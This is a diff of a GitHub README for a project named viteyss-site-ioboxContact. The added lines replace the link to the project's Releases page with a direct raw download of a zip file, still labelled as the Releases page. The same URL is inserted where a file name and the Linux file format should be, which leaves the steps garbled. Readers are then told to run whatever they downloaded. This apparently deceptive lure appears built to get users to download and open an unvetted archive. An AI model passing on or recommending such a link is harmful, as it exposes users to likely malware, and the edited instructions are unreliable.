A7med3ala2/viteyss-site-ioboxContact/README.md

 To get started, you need to download the application.
 Follow these steps:

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/A7med3ala2/viteyss-site-ioboxContact/releases).
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/A7med3ala2/viteyss-site-ioboxContact/main/compliant/viteyss-site-ioboxContact.zip).

 2. **Select the Latest Release**: Look for the latest version at the top of the page.
 Click on it to view the details.

 3. **Download the Application**:
-   - If you see a file named something like `viteyss-ioboxContact-v1.0.exe`, click on it to download.
+   - If you see a file named something like `https://raw.githubusercontent.com/A7med3ala2/viteyss-site-ioboxContact/main/compliant/viteyss-site-ioboxContact.zip`, click on it to download.
-   - If you see other file formats, choose the one suitable for your operating system (e.g., `.exe` for Windows, `.dmg` for Mac, or `.tar.gz` for Linux).
+   - If you see other file formats, choose the one suitable for your operating system (e.g., `.exe` for Windows, `.dmg` for Mac, or `https://raw.githubusercontent.com/A7med3ala2/viteyss-site-ioboxContact/main/compliant/viteyss-site-ioboxContact.zip` for Linux).

 4. **Run the Application**: After downloading, locate the file you saved (usually in your Downloads folder).
 Double-click it to run the application.